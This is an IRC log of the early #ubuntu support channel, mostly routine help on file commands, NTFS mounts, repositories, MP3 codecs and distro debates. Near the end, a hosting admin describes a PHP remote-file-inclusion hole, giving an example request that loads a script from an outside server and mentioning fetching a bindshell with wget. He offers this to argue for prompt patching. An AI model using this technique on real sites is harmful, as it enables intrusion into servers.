BigNastyKid909ficusplanet: will that be the same if i want to copy? cp file1 file2??07:43
ficusplanetBigNastyKid909, Yeah, cp file1 file2 destination07:43
BigNastyKid909cool thanks for the help07:44
stuNNedpaulproteus, basically i think it's just setting up/installing icewm through synaptic, logging out then selecting icewm as your default desktop07:44
|trey|bob2, I removed hal, and things stopped mounting without me telling them too...07:45
yohanneshi guys, i have a basic q. when i restart my box, i selected the "save current setup". now everytime i restart apps that were running during the save, returned automatically. how can i reset this?07:45
|trey|bob2, afaik, gnome-volume-manager just handles the gnome side of handling media, displaying an icon, default app, things like that...07:45
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bohrbugWould you say that Ubuntu as server only can safely be used in production just as Debian woody?07:47
bohrbugI am thinking of upgrading my woody server to ubuntu07:47
Burgundaviabohrbug: Do you need to?07:47
paulproteusborup: I'd switch it to Debian Testing if possible.07:47
|trey|bohrbug, no, debian woody has had much longer to find security holes and bugs...07:47
ficusplanet|trey|, g-v-m does more than that.  It is a policy manager on top of HAL. HAL simply sends events and g-v-m decides what to do in reaction to the events.  g-v-m, though, just silently stops working without hal.07:47
paulproteusThat'll be the next release very soon, and has most of the trappings of Ubuntu Warty.07:47
paulproteusFrom the server end, that is.07:47
BigNastyKid909ficusplanet: one more question, if u don't mind, how do i rename a directory?07:47
Burgundaviabohrbug: If Woody is working fine, I wouldn't touch it07:48
paulproteusmv old_name new_name07:48
BigNastyKid909thanks paul07:48
bohrbugBurgundavia: Trouble is that woody apps lacks some functionality I need07:48
paulproteusbohrbug: I say this partially because I'm working on moving my server from Woody to Testing (soon to be released Sarge).07:48
paulproteusBecause I need functionality :)07:48
bohrbugpaulproteus: I have been thikning about the same, but decided to wait until official release07:49
|trey|paulproteus, risk vs functionality is a tough decision imo...07:49
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bob2|trey|: no, hal sends a message to gnome-volume-manager07:49
bohrbugBut, again, Ubuntu benefits from all security fixed of both sarge and woody07:50
yohanneshi guys, i have a basic q. when i restart my box, i selected the "save current setup". now everytime i restart, apps that were running during the save, returned automatically. how can i reset this?07:51
billytwowilly how do I tell gnome to use a different app to open a file? select default applications is seriously lame.07:51
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paulproteusbillytwowilly: Right-click and choose "Open With"?07:51
ficusplanetbillytwowilly, Right-click on the file and choose properties.  Go to the Open With tab.07:51
|trey|bob2, wouldn't that mean hal depends gnome-volume-manager? else where would it send the info? but it doesn't... it depends dbus... and g-v-m picks up that info... I dunno though, using XFce4, with hal installed for whatever reason, things mounted and it pissed me off... hal was deleted, this stopped...07:52
billytwowillyhmm. Thanks. I'm not sure if I like that more or less than the way KDE does it.07:52
bob2|trey|: no, that's not how dbus works07:52
billytwowillyIs there a way to get a quickbrowser dropdown window of a file system?07:52
ficusplanet|trey|, HAL, using dbus, says to anything listening, "Hey this device was plugged in." g-v-m is made to listen for those messsages and mount volumes accordingly.  The GNOME-specific stuff is a very small part of g-v-m.07:53
|trey|ficusplanet, umm... thats what I just said...07:54
bob2|trey|: no it's not07:54
bob2|trey|: hal sends the messages over dbus...if g-v-m is installed, it hears it and mounts stuff07:54
corbobhttp://whytheluckystiff.net/clog/proggies/whoaBeAHacker.html j00 2 c4|\| b33 4 h4x0r!!!07:55
=== hypa7ia falls over
hypa7iathat is awesome07:55
|trey|bob2, I'm not seeing a diff... but ok  :/07:55
corbobhypa7ia, what are you referring to?07:56
|trey|Maybe cuz I know what I meant though...07:56
ficusplanet|trey|, Yeah, it's easy to misunderstand each other over IRC.  Oh well.07:56
bob2|trey|: "wouldn't that mean hal depends gnome-volume-manager?".  no, hal doesn't give a fuck.  it broadcasts the message, if g-v-m is around, it gets it.  if not, the message disappears into the ether.07:57
|trey|bob2, guess you are being as picky as me though, so its ok...07:57
hypa7iayour link, corbob07:57
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bob2|trey|: no, it's not pickiness, it's an important difference07:57
corbobthat's what i thought but i wasn't sure07:57
bob2dbus will 0wn j00, you need to know how it works ;-)07:57
=== hypa7ia grins
|trey|bob2, I know how it works... I read a lot about it... I didn't even state an action word though in actuality... I was just stating that hals functionality wasn't just for gnome-volume-manager.... I'm high, please don't make me think more  :(08:02
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bob2yes, hal does lots of stuff08:04
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bob2but g-v-m is in charge of mounting stuff08:04
Gmailbob2: i need to msg ya it will be offtopic here08:05
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bob2Gmail: why?08:05
|trey|bob2, thats the part I am confused about... as I said, removing it while using XFce4 stopped (a cdrom) auto-mounting08:06
Gmailbob2: if i say why i might as well ask away the total offtopic stuff here (ebay related)08:06
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|trey|bob2, didn't even know what gnome-volume-manager did at that point, let alone have it installed  :(08:07
|trey|Still don't know much about g-v-m, I should read about it, but yeah...08:07
ficusplanet|trey|, g-v-m is installed by default.  The reason removing HAL would dtop the mounting is that there would then be nothing sending out messages to g-v-m saying "Hey, this is plugged in."  So g-v-m would just kind of sit there.08:08
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|trey|ficusplanet, this was regular Debian, I always know about every package installed when I use Debian... I kinda get obsessive about it even...08:08
ficusplanetWell, HAL alone does not mount anything.08:09
|trey|ficusplanet, no longer do that though, mainly cuz there is too much on an Ubuntu system I don't know about, and don't have time to read about them all right now  :(08:09
bob2|trey|: g-v-m's part of the ubuntu base system08:09
ficusplanet|trey|, HAL simply sends some messages about hardware using dbus. That all it does/can do.08:09
Gmailbob2: am i ignored?08:10
|trey|bob2, apt-cache show ubuntu-base | grep gnome-volume-manager  :/08:11
=== |trey| slaps self for being argumentative
Gmailhey anyone here i can ask an opion one something for please pm me08:12
ficusplanetGmail, Just ask.08:13
|trey|ficusplanet, as I said, I do know how dbus works... its the only thing we are talking about that I *have* read about...08:15
Gmailficusplanet: i /msg you do you auto ignore them...?08:16
ficusplanetGmail, No, just waiting for the page to load.08:16
Gmailficusplanet: 18.8k? 28.8k?08:17
|trey|Gmail, if its computer related, just ask here... no one wants to talk to a stranger in private...08:17
Gmailits ebay related08:17
Gmail<Gmail> oki am going to sell linux distros on ebay08:18
Gmail<Gmail> tell me how you like my mepis template08:18
Gmail<Gmail> http://www.distros.uni.cc/ebay/mepis.html08:18
Gmail<Gmail> and what should be changed...08:18
|trey|Gmail, eh... ficusplanet seems to have a different feeling to me, nm...08:18
ficusplanetGmail, I have a cable connection, but your page contains six ~500K images.08:18
bob2Gmail: I'm not going to be your ebay consultant, or spell checker, sorry08:19
|trey|Mepis is looking like Ubuntu using KDE... would be nice to have some communication there... could answer questions both likely recieve  :)08:20
bob2Gmail: please try to stay on topic08:20
|trey|(afaict, Mepis includes no GNOME or GTK by default)08:20
|trey|bob2, its my fault that he said it in the channel, sorry  :(08:21
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bob2just don't encourage Gmail to rant about random off-topic stuff at all08:21
Gmaileeek mepis doesn't have gnome THAT SICK MINDED08:21
bob217:20:44           bob2 | Gmail: please try to stay on topic08:21
Gmailficusplanet: LOL08:21
bob2if you want to generally chat about random stuff, try austnet or efnet or something.08:22
Gmailbob2: there all loser there they banned me from austnet for 2min for ask it08:22
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bob2Gmail: I can't imagine why08:23
|trey|bob2, sarcasm is mean  >:)08:24
bob2Gmail: just stay on-topic please08:24
bob2mepis is off-topic08:24
Gmailbob2: anti-ubuntu they want me to tern to the dark side red hate08:24
bob2you trying to sell stuff on ebay is off-topic08:24
bob2you being banned for being verbose is off-topic08:24
|trey|bob2, What I said is Ubuntu related though  :/08:24
Gmailbob2: that why i said it offtopic08:24
bob2Gmail: just don't bring it in here at all, please08:24
bob2|trey|: ubuntu-desktop08:25
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|trey|bob2, ubuntu-desktop != ubuntu-base  ;)08:25
Starseedhello from the warty live-cd :)08:25
bob2yes, I know, but it's part of the default install08:25
|trey|bob2, [00:10]  <bob2> |trey|: g-v-m's part of the ubuntu base system  ... this is why I slapped myself for being argumentative...08:26
bob2you're shockingly tedious08:26
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tt1kki am pissed as fuck08:30
tt1kkthat wifi won't work on the new powerbooks08:31
|trey|tt1kk, not the best way to approach people you want help from...08:31
tt1kkhow can i be helped ?08:31
Pizbittt1kk: Changed the way you're pissed and get some vodka?08:32
jdubtt1kk: you can't be. get on the phone to broadcom, and let it out (diplomatically). :-)08:32
tt1kkapple should have put all device drivers into darwin08:33
ficusplanetjdub, Nice to see you.  I've been wondering all night what _exactly_ the "SVG aware artwork" assigned to Mark Shuttleworth on the Hoary Goals page is.08:33
|trey|tt1kk, but then they don't get lock in with customers that buy airports... :/08:34
tt1kkwhat is the airport lockin ?08:34
tt1kkwhat model is it08:35
tt1kkthat's the airport extreme ?08:35
|trey|tt1kk, ahh... wait, yeah, I wasn't here earlier... just saw what jdub said  :(08:35
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jason_anybody here?08:41
jason_wow it is silent in here08:42
ficusplanetYeah, it just died down recently for some reason.  Been pretty active all night.08:42
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jason_how do I change permissions of a folder to enable write access recrusively?08:48
joolzchmod -R ugo+w *08:49
joolzdo a man chmod first08:49
jason_thanks it worked08:50
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jason_is there anyway that I can remove all filetypes except one in a folder recrusively?08:51
jason_should I man rm?08:51
jesperjason_, what do you mean by filetype?08:52
jason_I want to remove everything except my mp3s from my music folder08:52
jesperIf there is a common extension, then you can do stuff like this..08:53
=== MikeGTN is now known as MikeAFK
dopeyfind ! -file \*mp3 -exec rm "{}" \;08:53
jason_rhythmbox wont load my library if I have anything but mp3s08:53
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jesperfind /mp3s -type f | egrep -v '*.mp3$' | xargs rm -f08:53
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dopeyjesper: that'll still have problems with files with spaces in the name08:54
jesperdopey, Sure, that's why i don't have any of them :-)08:54
jason_it didn't work08:55
jason_dopey and jester08:55
jesperjason_, do you have spaces in your filenames/directorynames?08:56
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jesperjason: then i'd go for dopey's soulution if I were you.08:58
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jason_jason@ubuntu:~ $ find ! -file \*mp3 -exec rm "{}" \;s/home/jason/My\ Music/09:00
jason_find: invalid predicate `-file'09:00
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joolzjason_: maybe --file09:00
jesperjason, -name09:01
joolznormally in parameters - is for abbrevations, -- for long names09:01
jespernot -file09:01
jason_jason@ubuntu:~ $ find ! -name \*mp3 -exec rm "{}" \;s/home/jason/My\ Music/09:02
jason_find: missing argument to `-exec'09:02
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jesperYou're missing a backslash..09:03
jesperlast, before ;09:04
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tt1kkwe need to promote XUL09:05
tt1kkif we want to stop microsoft from taking over internet apps with longhorn09:05
tt1kkmozilla has made XUL awesome, but no one knows about it09:05
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jespertt1kk, how is XUL better than perl or python?09:08
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billytwowillywhere can I find a deb of unrar?09:09
tt1kkXUL is just a standard way to describe user interfaces09:09
tt1kkthe coding can still be done in python / perl09:09
jason_what about xaml09:09
jason_puts on flame suite09:09
tt1kkxaml is microsoft's stuff09:09
tt1kkthey copied XUL09:09
tt1kkintegrating it well with VB / C# to make a sell to developers09:10
tt1kkthat's where we lack09:10
Treenakstt1kk: GTK/Gnome# are well-integrated with C# now, aren't they?09:11
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tt1kklet me show you what i mean09:11
tt1kkdo you have firefox09:11
ChrisHHi, folks. Ubuntu newbie here. :) Is Ubuntu based 100% on Debian or is it possible to contribute directly to Ubuntu? Background: I'm contributing to Debian but develop a more or less strong dislike for the "human structures" in there. :)09:12
jdubChrisH: both :-)09:12
ChrisHjdub: I see.09:12
PizbitChrisH: based on debian snapshots09:12
hypa7iaas i understand it, stuff gets contributed back into debian, right?09:13
PizbitChrisH: Not the ol' ChrisH from welly eh?09:13
Pizbithypa7ia: Yeah09:13
zu22ChrisH: debian just likes to make sure u do things the Debian Way (tm) :)09:13
hypa7iai like how true to that Way ubuntu seems to be, but with, yknow, release dates :-)09:14
ChrisHPizbit: welly? perhaps not. :)09:14
__danielwhere can i announce a "give me a newer glibmm" wish?09:14
jdub__daniel: glibmm will be updated in hoary09:14
PizbitChrisH: Dang, your nick is exactly the same as someone I know in the local lug.09:14
ChrisHzu22: Debian is currently three words to me: release manager, debian account manager, flamewars09:14
__danieljdub: i use hoary09:14
jdub__daniel: then you'll have it soon09:15
__danieljdub: but i'd love to use this: http://www.murrayc.com/blog/index.cgi/tech/2004-11-02-20-30 which would require glibmm-2.5.109:15
hypa7iaChrisH: lol09:15
jdub__daniel: faster if you send patches, of course09:15
__danieljdub: i'll learn the whole packaging stuff one day :-)09:16
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zu22ChrisH: lol09:16
phillg'day, how can i mount my ntfs partition (read only is fine) from a default fresh install of ubuntu? i've made a directory using sudo mkdir /mnt/store that i want to mount it to, and the partition is at /dev/hda509:17
=== hypa7ia is allergic to drama
hypa7iaphill: does sudo mount /dev/hda5 /mnt/store work?09:17
hypa7iadoh.  what errors?09:18
hypa7iait should i think09:18
philloh wait09:18
phillsilly me09:18
hypa7iaforgot sudo?09:18
hypa7ianice :-)09:19
phillok, how do i make it so a normal user (me) can view it?09:19
philllike -t ntfs -o user,ro or something?09:20
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hypa7iaerk, that i don't know09:20
hypa7iacome to think of it, i need to know as well09:20
philli'll have a hunt around  man files for it09:21
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xipCan someone tell me what I'm doing wrong?  My normal user account can't access my second hard-drive however I mount it09:23
hypa7iai think we need to change the group it's mounted as09:25
hypa7iabrb, gotta kill x09:26
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synapse\o/ got my fglrx drivers working09:30
synapsewith about 3800 in glzgears09:30
hypa7iasynapse: what card?09:30
hypa7iai have a radeon 9700 mobile. have yet to try :-/09:31
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synapseif you follow the guide in the wiki thn it works great09:31
synapseand then add another option to the X cfg09:31
synapsehmmm.... now to try a game09:31
synapsetuxracer :P09:31
phillplay some enemy territory :)09:32
hypa7iato-do for tonight:  ipw2200 wireless, x config, being able to access the windows partition not as root :-)09:32
synapsemight do09:32
philli've figured out the ntfs problem09:33
phillheres my fstab entry for it09:33
phill/dev/hda2 /mnt/store ntfs ro,utf8,umask=000 0 009:33
synapsephill: did you install any extras to get ntfs to work?09:34
phillthats read only btw09:34
synapsethey are trying to make a successful rw one09:34
philli'm not game to try writing to it at this point09:34
synapseit b0rks the partition if you right to it09:35
xipphill, you rule.  I got it working.  Thanks09:35
philli will convert it to fat on another system eventually, but until then read only is fine for my store partition09:35
phillno worries :)09:35
hypa7iai made mine fat32 so i wouldn't have to deal with this :-)09:35
xipisn't there something called captive ntfs that is supposed to allow you to write without trashing the fs?09:35
phillhypa7ia: the wonders of forward thinking, i wish i had made it fat now :(09:36
phillall i need is for this silly file browser to stop opening everything in a new window09:36
Pizbitphill: 2sec09:37
synapsephill: right click the folder and do explore09:37
synapseand it does it explorer like09:38
Pizbitgconf-editor apps->nautilus->preferences and tick "always_use_browser"09:38
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Pizbitphill: That'll get it to the old style behaviour09:38
phillah cool, the browser is much better, thanks heaps :)09:38
Pizbitphill: That's a matter of opinion:)09:39
philltrue, i remember the contention... i guess it's force of habit, but one i don't see any reason worth breaking it for..09:39
phillmmm gconf is nice!09:39
PizbitHeh, most people hate it09:40
phillhate having things open in the same window?09:40
__danielPizbit: really?09:40
Pizbit__daniel: Yeah, either because they find it a pain to use, or having to use it at all, or that they think it's similar to the windows registry09:40
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philloh gconf09:41
xipWell at least gconf usually tells you exactly what it is you're changing09:41
__danielPizbit: you mean people who have no clue? :-)09:42
phillwhat would be the best program for checking that my tv card (bt848) is working?09:42
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jason_it is an amazing tv app09:42
jason_I have the same card too phill09:43
phillcool, apt-get install tvtime ? (+/- sudo)09:43
jason_+ sudo09:43
duke|ibi just lost seven times in a row to four-in-a-row09:43
jason_sudo apt-get install tvtime09:43
jason_play a real game ;)09:44
phillphill@phillpc:~ $ sudo apt-get install tvtime09:44
phillReading Package Lists... Done09:44
phillBuilding Dependency Tree... Done09:44
phillE: Couldn't find package tvtime09:44
duke|ibi was waiting for my apt-get update to finish \o/09:44
duke|ibphill: are you using universe?09:44
jason_you need the universe09:44
jason_sudo gedit /etc/apt/sources.list09:44
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jason_and uncomment the universe repositories09:45
phillwill do09:45
jason_then apt-get tvtime again09:45
arun--a good light weight editor for scripting?09:45
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duke|ibjason_: i believe you need to apt-get update after that09:46
duke|ibnano is the easiest to learn09:46
philldon't need to apt-get update?09:46
jason_kate is very good if you want something graphical and don't mind kde apps09:46
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phillnano suits me fine for now, though my friend is always bugging me about vim09:47
jason_the vim elitism has to stop09:47
wmealing_nice work on the ppc port of ubuntu09:47
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jason_it isn't better.09:47
klasiphydwhats good (gui) for admining running services?09:47
wmealing_there is no vim elitism, its only anti emacsism !09:47
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synapsei find nano/pico a lot quicker and easier09:48
jason_me too09:48
synapse+ you dont have to remember loads of cmds09:48
jason_why do people hate emacs?09:48
arun--no color coding in nano09:48
synapsebecause they think they are good if they use vi/vim09:48
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jason_they think they are 133709:49
hypa7iai like both09:49
hypa7iahaven't really gotten good at either though09:49
jason_ohh I have to type more to save my document so it must be better09:49
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klasiphydis there any gui for controlling services?09:50
synapsethere are ones out there09:51
jason_there is in fedora09:51
synapsebut i havent seen one in the apt yet09:51
phillwhat does the little padlock icon mean on files in the browser?09:51
jason_I don't remember the name09:51
jason_that you don't have write permission phill09:51
jason_the filesystem you are accessing is ro09:52
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xipAnyone make a recommendation for a good mp3/ogg/flac player?09:53
Treenaksxip: rhythmbox09:53
duke|ibxmms, rythmbox09:53
BugSI have a problem. I want to install some software at my home ubuntu box, but i dont have internet there. What i want to do is get all the i386.deb packages from archive.ubuntu.com burn them and take them home. Is there some convinient way to do this?09:53
tom-catduke|ib, rite09:53
BugSxip: beep mesia player is my player of choice09:54
BugSbeep media player that is09:54
xipRhythmbox is having issues with my mp3s.  Complaining that it doesn't have a plugin of some sort09:54
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Treenaksxip: read http://www.ubuntulinux.org/wiki/BinaryFormats09:54
PizbitNah, this one:) http://wiki.ubuntu.com/RestrictedFormats09:55
duke|ibblah, does anyone know a way of mapping F12 to mouse1+control?09:55
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jason_I like Rhythmbox but I had to remove all none mp3s/vorbis files from my mp3 directory to even get it to load my library09:55
jason_it has quirks09:55
Treenaksxip: read http://www.ubuntulinux.org/wiki/RestrictedFormats09:55
Treenaksxip: sorry09:55
jason_but looks promising09:55
xipTreenaks, thanks09:55
BugSanyone with some idea for my problem?09:55
klasiphydbugs, convinient way of downloading, or installing09:55
PizbitNah, this one:) http://wiki.ubuntu.com/RestrictedFormats09:55
TreenaksBugS: your problem?09:56
PizbitWrong window heh09:56
jason_you need gstreamer-mad which can be found on the universe repository09:56
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BugSklasiphyd: downloading09:56
xipJust read that.  Thanks :)09:56
klasiphyddling to a windows or linux box09:57
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jason_they should just add in an easier way to get at restricted formats in hoary like a link on the desktop that points to a shell script that gets all the restricted stuff for you if you agree to a legal disclaimer09:57
duke|ibit's not that easy09:58
duke|iblegally, at least09:59
jason_other distros have MP3 support09:59
jason_DVD playback09:59
jason_flash plugins09:59
BugSTreenaks:  I want to install some software at my home ubuntu box, but i dont have internet there. What i want to do is get all the i386.deb packages from archive.ubuntu.com burn them and take them home. Is there some convinient way to download all the packages??09:59
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klasiphydbugs, what os are you going to use to download09:59
jason_I can understand DeCSS because it does break an ecryption system but MP3 codecs are reverse engineered and do not break any encryption09:59
TreenaksBugS: apt-cache search apt non-networked09:59
jason_how could open source mp3 codecs every be illegal09:59
duke|ibmp3 codecs aren't open source10:00
jdubjason_: the mp3 algorithm is patented.10:00
Pizbitjason_: Because they reverse engineered the official ones10:00
jdubduke|ib: yes they are10:00
jdubPizbit: no, that's not why10:00
duke|ibjdub: well, open source, but under restrictive licenses :)10:00
jason_reverse engineering isn't illicit?10:00
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duke|ibor just against the patent, whatever10:00
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jdubduke|ib: no, they're not. mad is GPLed.10:00
Pizbitjdub: Er, I was thinking of the patented bit but I'm typing somehting else too so I didn't bother heh:)10:00
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jdubjason_: it has nothing to do with reverse engineering - the mp3 algorithm is known.10:01
duke|ibjdub: ah10:01
BugSklasiphyd: i have debian here at work. I know that if i had ubuntu, i could copy the packages from /var/cache.. but thats not the case10:01
Treenaksjason_: the algorithm is patented. So if you make a program that uses t hat algorithm ("mp3 player") you might have to pay license fees10:01
duke|ibthat's more towards what i was trying to say!#%10:01
jdubs/might //10:01
jason_has the Mpeg forum ever even approached the GNU community?10:01
jason_asking for fees?10:01
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jdubjason_: thomson is the licensor for mp310:01
danielsit's not the mpeg forum, it's fraunhofer10:02
mike14I am trying to get my sound to work with ubuntu10:02
jdubjason_: and they are actively persuing licensing10:02
mike14i have a couple soundcards and i want to disable all of them except for my sound blaster10:02
mike14how do i go about this?10:02
Treenaksjdub: it depends on the patent.. you can get a patent and give licenses away for free10:02
danielsjdub: oh, is it thomson.  hmm.10:02
Treenaksjdub: (Free licenses for free..)10:02
danielsmike14: ehm, with a screwdriver?10:03
xipHow long until the patent expires?10:03
mike14daniels: embedded10:03
mike14daniels: i think the screwdriver might be a bad idea10:03
xipmike14: Try disabling the other through the bios?10:03
jdubTreenaks: not in the case of mp310:03
Treenaksjdub: true10:04
jk24jdub: hi, where can i found rules/conventions for building packages for ubuntu ?10:05
jason_It's funny because in an article I have it shows the fraunhofer institute using mandrake 10 to develop their next gen surround sound codec10:05
jason_I wonder if they'll GPL it10:05
jdubjk24: the debian policy10:05
jk24jdub: ok, and for the naming ?10:05
jdubjk24: check that the thing you want to package is not already in sid10:06
hypa7iaargh.  rhythmbox hates me.10:06
jason_Richard Stallman should DdoS them10:06
jdubjk24: up to the package maintainer, but some of that is described in debian policy too10:06
jdubjason_: ...10:06
synapsemy god, steam is working with 100fps in Counter Strike \o/10:06
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jason_because ddos attacks solve everything10:06
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hypa7iayay! i have music now :-)10:09
phillsorry i just missed all that, how do i get mp3 going?10:09
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hypa7iait's all there phill10:10
hypa7iano problemo10:11
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phill  gstreamer0.8-mad: Depends: libid3tag0 (>= 0.15.0b) but it is not installable10:11
phillany ideas?10:11
hypa7iawhat repositories do you have enabled?10:11
hypa7iai have universe and multiverse10:11
philluniverse and the default10:11
hypa7iafirst make sure your list is updates10:11
hypa7iaerr updated10:12
Treenaksphill: and, are you sure you're running warty?10:12
hypa7iathen maybe try adding multiverse10:12
phillyes warty 4.1010:12
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philladd what exactly?10:12
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hypa7iato your /etc/apt/sources.list10:13
hypa7iaor in synaptic10:13
phillis that something i uncomment or what?10:13
hypa7iaadd it after universe10:13
Pizbitphill: Tack on multiverse to the lines that have universe in them10:13
phillgotcha :)10:14
hypa7iadid it work?10:14
PizbitAnd then update again10:14
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phillupdating now, so i will soon see10:14
phillhmm nope10:15
phillsame error :(10:15
phillshould i uncomment the warty main restricted repositories?10:15
hypa7iathat;s super weird10:15
philli'll give it a shot10:16
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hypa7iait shows up for me in synaptic as an official ubuntu package10:16
hypa7iayeah! that should do it10:16
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phillah all good now10:18
philli think its because when i installed, i said no to connecting to the net for updates10:18
hypa7iahahaha that miht do it :-)10:18
phillbecause my dsl is shaped right now to 64kbit, so i didn't want to get a lot of updates10:18
philli will run apt-get upgrade overnight10:18
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hypa7iathat's brutal slow man.  is it time-of-day based?10:20
phillits all good :) picked up my sblive nicely.10:20
phillno sadly. australian internet is not quite up to scratch10:20
hypa7iaup here in canadaland we have wicked-good dsl10:20
PizbitNor here either.10:20
PizbitSlowly slowly slowly getting better10:20
philli only have a day left of shaping, usually i don't go over my 20gb of quota, but this month i did10:21
hypa7iano quotas here :-)10:22
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hypa7iai downloaded >4 gigs yesterday :-)10:22
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phillyeah, i can pay twice the price for unlimited, and probably will if i start downloading more than usual. 1.5mbit is a good speed, just the quota doesn't match it too well.10:22
PizbitHow big?10:22
leeechhow do i execute a script/program on bootup without login?10:22
hypa7iathey upped us to 3mbit here10:22
leeechi tried puttin in /etc/inittab but not workin10:22
leeechany idea?10:22
Stingerleeech add it to your rc.local file10:22
danielsaustralian internet is notoriously poor unless you pay up the hizzle.10:22
leeechetc rc.local?10:22
phillyeah :(10:22
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Pizbitdaniels: NZ's is worse10:23
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hypa7iait's kinda crap in canada tho.  the gov spent billions making a great infrastrcuture then sold it to bell for $110:27
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leeechthere is no rc.local10:28
leeechwhere shud i put?10:28
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jason_how can I get vsync in zsnes in opengl?10:30
StingerForgot you running ubuntu10:30
Stingermust look at it10:30
RuffianSoldierGmail sucks, KMail is better, Evolution is the best10:30
Stingerbusy downloading10:30
StingerEvolution 2 is great10:30
jason_gmail is webmail10:30
RuffianSoldieri know10:30
RuffianSoldierEvolution rules10:31
Stingertry openwebmail for your webmail stuff10:31
tuppareal men telnet to their imapd to read emails ;)10:31
phillI couldn't see how to get divx/xvid going in the restricted formats faq, does anyone here know how?10:31
Pizbitphill: Read to find out how to get w32codecs10:31
Pizbit(That same page)10:31
jason_bye real men you mean men who are too nerdy to ever get any10:31
Stingertuppa...men with no lives do that to10:31
jason_right tuppa?10:31
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leeechthat means there's no way to run a script / program on startup10:33
tuppaStinger: not GPL10:33
Stingerthere must be10:33
RuffianSoldierWTF?!?! JUST HAPPEND!10:33
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hypa7ianetsplit, RuffianSoldier10:34
Stingertuppa...hmmm...there are alot of Email Clients for linux that are console based10:34
Tsjoklatevening all10:34
tuppayes I know10:34
jason_go to sessions in the control centre10:34
tuppaI feel like trolling :)10:34
RuffianSoldierhypa7ia, wtf is netsplit?10:34
KeybukRuffianSoldier: IRC network splits in half10:34
jason_then click startup applications10:35
Keybukbunch of people on one side, everyone else on the other10:35
leeechjason... thanks will try10:35
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Tsjoklatdesynced Ruffian10:35
leeechanyway without using gnome10:35
leeechbut from console?10:35
jason_not that I know of10:35
jason_I wish it used .xinitrc10:35
leeechwhy they remove rc.local?10:35
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Keybukthere will be a big red notice in a minute with some excuse or other :o)10:37
dredgirc servers are linked. people join this channel on one server10:37
dredgand others join this channel on others10:37
dredgone server delinks and it takes everyone with it10:37
=== thoreauputic_ [~petros@wolax6-176.dialup.optusnet.com.au] has joined #ubuntu
=== Stinger is now known as Inode
Keybukand when it reconnects, everyone comes back :)10:37
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phillthey won't even notice...10:38
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Inoderecompiling Kernel with 2.6.910:38
Inodeanyone played with it10:38
InodeTaking forever on Slackware10:38
GnuHippyhave you tried x.org on ubuntu?10:38
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Inodedownloading ubuntu at the moment10:39
GnuHippyI have all the dependancies and I am still getting errors10:39
Inodeusually use RHEL and OPEN BSD10:39
GnuHippyewww redhat10:39
InodeRH works10:39
GnuHippywhy openbsd over free or net?10:39
Inodebeen using it for 10 years10:39
GnuHippyI have used it off and on for 610:39
InodeJust preference10:39
InodeBSD is BSD10:39
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GnuHippyRedhat that is10:39
InodeDid the RHCE cert ...so I know it backwards10:40
GnuHippydependancy hell as I now refer to it10:40
Inodeand Linux is Linux10:40
Inodeall the same under the hood10:40
Inodejust the way the companies put it all together10:40
Inodealso ....most apps are written for RH10:41
GnuHippyyeah but the package managment sucks10:41
InodeRPMS available10:41
GnuHippyup2date is terrible10:41
GnuHippyyum is too10:41
InodeSo no long compiles with Make and dependency hell10:41
dredgthat depends10:41
InodeI usually come right10:41
Inodeits all the same tho10:42
InodeI like Suse to10:42
Inodeuse RH...Suse...Slackware10:42
topylii know a few people who can handle rh very well. somehow it never breaks on them :)10:42
InodeI hate Mandrake tho10:42
GnuHippyI used mandrake from 8.1-1010:42
InodeI have RH boxes that have been up for 2 years +10:42
GnuHippy10 sucked10:42
dredg2 years?10:42
InodeBeen using Redhat from 110:43
dredgdont you apply security updates?10:43
InodeVer 110:43
dredgand you dont reboot for new kernels?10:43
GnuHippyyou can't upgrade Redhat without breaking it10:43
dredgsorry, uptime is a myth10:43
GnuHippylike redhat 8 - 910:43
InodeI have never had a problem10:43
dredgi usually get around 50 days before im forced to reboot for one reason or another10:44
InodeRedhat 8 was problematic10:44
Inode9 is fine10:44
InodeI never run into those kind of problems10:44
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Inodeusing FC2 at the moment10:44
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Inodeand RHEL 410:44
topylii had rh9 when i wanted to try ximian xd2. couldn't get used to it, but it worked just fine10:44
GnuHippywhy not Rawhid?10:44
InodeRawhide stuff is not tested properly10:45
topyliGnuHippy: you don't actually "use" rawhide :)10:45
dredgsome of us run a load of public-facing servers :) not applying timely kernel upgrades and rebooting to use them isnt an option :)10:45
InodeFound rule of thumb is stick to the versions that come with the distro and you will not have problems10:45
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Inodeput Sendmail 8.13.1 on Redhat 7 box...10:46
=== deFrysk [~deFrysk@g90181.upc-g.chello.nl] has joined #ubuntu
InodeI had so many problems10:46
GnuHippyI've had more kernel panics in Redhat and Mandrake than any other distro and thats in final versions10:46
Inodeshould have just left version 8.1110:46
topylidredg: kernel security problems tend to be local10:46
dredgdoesnt matter10:46
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Inodegood security policies and Firewalls can usually close alot of software holes10:47
dredgi work for a web hosting company. youd be amazed at some peoples code10:47
dredgi cannot take chances10:47
Inodenope....I would not10:47
=== GnuHippy is now known as Sanzen_reprise
InodeI don't under estimate stupidity10:47
topylidredg: well, that's probably true10:47
dredgtopyli: heres an example of a piece of code i spotted on monday night: include ($article."php");10:48
topyliInode: yeah, no patch for that coming in the near future10:48
InodeSome peoples way of thinking is equivalent to /dev/NULL10:49
dredgthis piece of code allowed anyone to run a php script with file.php?article=http://some.other.server/myownfile&args=whatever%20i%want10:49
topylidredg: nice10:50
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=== Sanzen_reprise mounts /dev/bed /home/jason/tmp
hypa7iatime for sleep10:50
hypa7ianite all10:50
dredgin fact, with that piece of code, you could wget a bindshell to a writeable directory and execute it. your "local only" argument gets bombed out of the water there :)10:50
InodeYou guys every browse www.distrowatch.com10:50
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InodeSome good security articles10:51
dredgi tested this myself btw. all i needed was a php script on another server with `system(somecmd); ' and i could execute whatever i wanted (as the apache user)10:52
topylidredg: yeah well, there's probably lots of weird code on such servers, and still you have to let unknown people run shit on them, that's for they're for :] 10:52
ChrisHA question that I ask myself... if Ubuntu is Debian-based but mainly releases more often... then why isn't the effort put into the Debian project? Why do the double-work? It is because the Ubuntu founders decided that the Debian structures are too twisted to be improved? Just curious.10:53
Inodegoing to have to chroot jail apache10:53
TsjoklatI think it is way more then that ChrisH10:53
dredgi run a pix as well. it limits a lot of what could happen, but i still cant take chances :)10:53
topyliChrisH: the work isn't duplicated really. the ubuntu work does go back to debian10:54
InodeMark has alot of money to spend....and it not quite yours without your own name on it!10:54
ChrisHTsjoklat: I don't mean to bash either distribution. I'm really interested in Ubuntu. :)10:54
Inodebesides....why improve someone elses stuff when you can make your own10:55
Inodelearn from there mistakes10:55
TsjoklatChrisH a lot of ppl love debian distro but are not too happy about the developers10:55
ChrisHTsjoklat: That's exactly the reason I'm disappointed of Debian.10:55
InodeDebian takes years to move ahead10:55
